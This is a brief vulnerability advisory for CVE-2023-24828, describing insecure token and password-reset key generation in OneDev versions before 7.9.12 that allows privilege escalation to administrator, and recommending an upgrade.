CVE-2023-24828

Name of the Vulnerable Software and Affected Versions Onedev versions prior to 7.9.12

Description Onedev is a self-hosted Git Server with CI/CD and Kanban. The algorithm used to generate access token and password reset keys was not cryptographically secure in versions prior to 7.9.12. Existing normal users, or everyone if self-registration is allowed, may exploit this to elevate their privilege and obtain administrator permission.

Recommendations For versions prior to 7.9.12, upgrade to version 7.9.12 to address the issue. As a temporary workaround, consider restricting self-registration and closely monitoring user activities until the upgrade is applied. There are no known workarounds for this issue other than upgrading to the fixed version.